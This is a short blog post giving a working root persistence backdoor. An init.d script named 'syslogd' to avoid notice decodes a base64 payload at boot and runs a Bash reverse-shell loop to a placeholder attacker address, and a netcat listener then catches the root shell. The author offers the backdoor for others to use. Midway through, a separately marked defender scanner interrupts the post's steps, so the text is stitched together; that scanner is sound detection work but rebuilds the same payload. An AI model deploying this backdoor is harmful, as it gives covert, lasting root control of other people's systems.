
Init.d root reverse Shell

Strider · 2 min read

I took the liberty of playing around with Bash a bit. What came out of it is a small reverse TCP shell that runs as an init.d script. The idea was the following: "What if you already have root rights on a system? You don't want to create a new user that also has root rights, because it might be noticed. So what do you do? Of course you create a backdoor that runs with root rights." And that's exactly what this is.

I have built a small init.d script that implements exactly this and thereby makes direct use of the root rights at startup. Since every init script is executed with root privileges during boot, this script can spawn a root shell directly. The most important part is the Base64-encoded string "IyEvYmluL2Jhc2...", which decoded normally looks like this.

#!/bin/bash
while true; do /bin/bash -i &> /dev/tcp/<yourip>/<port> 0>&1; sleep 5; done

What does it do exactly? It runs an infinite loop that starts a Bash shell. All input and output is redirected to the address named in /dev/tcp/; opening that path makes Bash establish the TCP connection directly. The loop repeats every 5 seconds, so the shell reconnects if the connection is lost.

You can write the command into a separate file, read it back out Base64-encoded, and the string is ready:

$ cat payload | base64

We simply put this into the init.d script and adjust a few details where necessary, such as the name of the service. Here it is called syslogd so that it is not so noticeable.

#! /bin/bash

### BEGIN INIT INFO
# Provides: syslogd
# Required-Start: $local_fs $network
# Required-Stop: $local_fs
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Short-Description: syslogd service
# Description: Run syslogd service
### END INIT INFO

case "$1" in
start)
echo "Starting syslogd..."
FILE="rsyslog"$(date +%s)".tmp"
echo "<base64 payload>" | base64 -d> /tmp/$FILE
/bin/bash /tmp/$FILE
;;
stop)
echo "Stopping syslogd..."
;;
*)
echo "Usage: /etc/init.d/syslogd {start|stop}"
exit 1
;;
esac

exit 0
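From the defender's side, the two things this script relies on, a run-time `base64 -d` inside an init script and an embedded blob that decodes to a `/dev/tcp` redirection, are also what give it away. The scanner below is an added example and is not part of the original post or its script; it flags init.d-style scripts that show either indicator. The directory, file names and sample scripts it creates for the demo are constructed here, and the address 192.0.2.10 in the sample is a non-routable placeholder.

```shell
#!/bin/sh
# Added defender-side example, not part of the original post: flag init.d-style
# scripts that stage a payload the way the post describes (base64 -d at start
# time, or an embedded blob that decodes to a /dev/tcp reverse shell).
# Directory, file names and sample scripts below are constructed for the demo.

# Print "yes" if FILE looks like a staged reverse-shell launcher, else "no".
is_suspicious_init_script() {
    f="$1"; found=no
    # Indicator 1: the script decodes base64 at run time. A legitimate service
    # script has no reason to carry its real commands encoded.
    if grep -Eq 'base64[[:space:]]+(-d|--decode)' "$f"; then
        found=yes
    fi
    # Indicator 2: any base64-looking run of 40+ characters that decodes to a
    # /dev/tcp redirection or an interactive shell invocation.
    for blob in $(grep -oE '[A-Za-z0-9+/]{40,}={0,2}' "$f" || true); do
        decoded=$(printf '%s' "$blob" | base64 -d 2>/dev/null) || continue
        if printf '%s' "$decoded" | grep -Eq '/dev/tcp/|/bin/(ba)?sh -i'; then
            found=yes
        fi
    done
    echo "$found"
}

# Scan every regular file in DIR; report hits on stderr, print the hit count.
count_suspicious_init_scripts() {
    dir="$1"; n=0
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        if [ "$(is_suspicious_init_script "$f")" = yes ]; then
            echo "SUSPICIOUS: $f" >&2
            n=$((n + 1))
        fi
    done
    echo "$n"
}

# Build a constructed demo directory: one benign script and one copy of the
# post's pattern with a placeholder address. Prints the directory path.
make_sample_dir() {
    d=$(mktemp -d)
    cat > "$d/cron" <<'EOF'
#!/bin/sh
case "$1" in start) echo "Starting cron"; /usr/sbin/cron ;; esac
EOF
    # Same payload shape as in the post, encoded without line wrapping.
    payload=$(printf '%s\n' '#!/bin/bash' \
        'while true; do /bin/bash -i &> /dev/tcp/192.0.2.10/4444 0>&1; sleep 5; done' \
        | base64 | tr -d '\n')
    cat > "$d/syslogd" <<EOF
#!/bin/bash
case "\$1" in
start) echo "$payload" | base64 -d > /tmp/rsyslog.tmp; /bin/bash /tmp/rsyslog.tmp ;;
esac
EOF
    echo "$d"
}

# Usage: ./scan_initd.sh --demo      (or call count_suspicious_init_scripts /etc/init.d)
if [ "${1:-}" = "--demo" ]; then
    demo=$(make_sample_dir)
    count_suspicious_init_scripts "$demo"
    rm -rf "$demo"
fi
```

Point `count_suspicious_init_scripts` at /etc/init.d on a live host, or run the script with `--demo` to see it flag the constructed sample and pass the benign one. Note that GNU `base64` wraps its output at 76 columns, so a blob pasted straight from `cat payload | base64` may span several lines; each line is then decoded on its own and a split indicator can be missed, while the run-time `base64 -d` check still fires. Scanning a copy of the file with newlines removed narrows that gap.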

Now just log out of the system, start a netcat listener and wait a short while.

After that, a shell should have arrived.

And off you go 😄

So far the whole thing has only been tested on Debian-based systems.

I hope someone can do something with it 😄